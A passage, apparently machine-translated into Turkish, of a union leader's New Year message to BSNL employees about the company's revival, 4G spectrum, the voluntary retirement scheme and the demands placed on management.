karşılanmaktadır. 5G spektrumunun tahsisi, offing'de başka bir olumlu karardır.

    BSNL'nin her bir çalışanı, özellikle SNEA Yoldaşları, Sendika hareketinde başka bir tarih yaratarak bu muhteşem başarıya değer verebilir. Evet Yoldaşlar, şirketin canlanması için diğer çalışanlarla omuz omuza mücadele ederek, diğer sektörlere örnek teşkil ederek tarih yarattık. En zor dönemde AUAB bayrağındaki mücadeleye öncülük ederek böylesi bir mücadelenin parçası olmaktan ve kararlı üyelerden oluşan bir Derneğe liderlik etmekten çok gurur ve mutluluk duyuyorum. Bunlar hayattaki unutulmaz anlardır.

    Şimdi çok umut ve beklentilerle 2020'nin eşiğindeyiz. BSNL'de pozitiflik arıyoruz. BSNL canlanması, bunların ilkidir.

    Tahsis edilen spektrumda tüm Hindistan bazında 4G lansmanı ertelenmemelidir. Müşteriler hevesle o anı bekliyorlar. Aynı şekilde BSNL, ücretsiz 4G spektrumunun tahsis edilmesinden sonra da Govt'a sorumludur. Ağın modernizasyonu hızlandırılmalıdır. Operasyonel sorunlar ve işçilere, yüklenicilere, satıcılara, arazi sahiplerine vb. Ödenmemiş aidatların ödenmesi, herhangi bir dış kaynak kullanma modelini başarılı kılmak için acil zorluklardır. BSNL, geleceğe yol açacak olan aidatlarını temizleyerek aralarındaki güveni yeniden kazanmak zorundadır. Parayı devlet tahvili yoluyla gerçekleştirmek ve araziden para kazanmak bu yönde iki önemli önlemdir. Yönetim, VRS sendromundan çıkmalı ve BSNL'nin 1/31/2020 tarihinden sonra kesintisiz hizmet vermeye devam etmesini sağlamak için bu konular üzerinde çalışmaya başlamalıdır. Çok sayıda sadık müşteri, kitlesel gönüllü emeklilik konusunda gerçekten endişeli ve VRS sonrası senaryoya olan güvenlerini yeniden kazanmak bizim sorumluluğumuzda. Bu bakımdan yönetim kararları çok önemli olacaktır.

    Yukarıdaki konulara ek olarak, yönetimin kalan% 47 çalışanı VRS sonrası durumda tüm iş yükünü üstlenmeye nasıl motive edeceği, gelir getiren saha birimlerinde yaratılan boşluğu nasıl dolduracağı vb. BSNL'nin yeniden canlandırılması çabaları üzerine. Üst düzey Yönetici sıkıntısı, yeni politika ile sadece VC alarak birkaç gün içinde yapılabilen terfi ile kolayca karşılanabilir.

    Çalışanların% 50'den fazlası hedeflerini aşarak VRS aldığından DoT / Devlet ve BSNL yönetimi, çalışan maliyeti adına artık mazeret üretilemez. Yöneticilerin gücündeki profesyonel olmayan ve ciddi azalmanın BSNL'nin yeniden canlanmasında olumsuz etkisi olacağı ve iyi çalışanların BSNL'de tutulacağı konusunda yönetimi zaten uyardık. Her şey, yönetimin kalan çalışanları VRS sonrası senaryoda nasıl kazançlı bir şekilde kullandığına bağlıdır. Profesyonel bir yaklaşım ve hızlı politika kararları, BSNL'yi bir kez daha yoluna sokabilir.

    2020'nin BSNL ve tüm ülke için iyi haberler getireceğini umalım.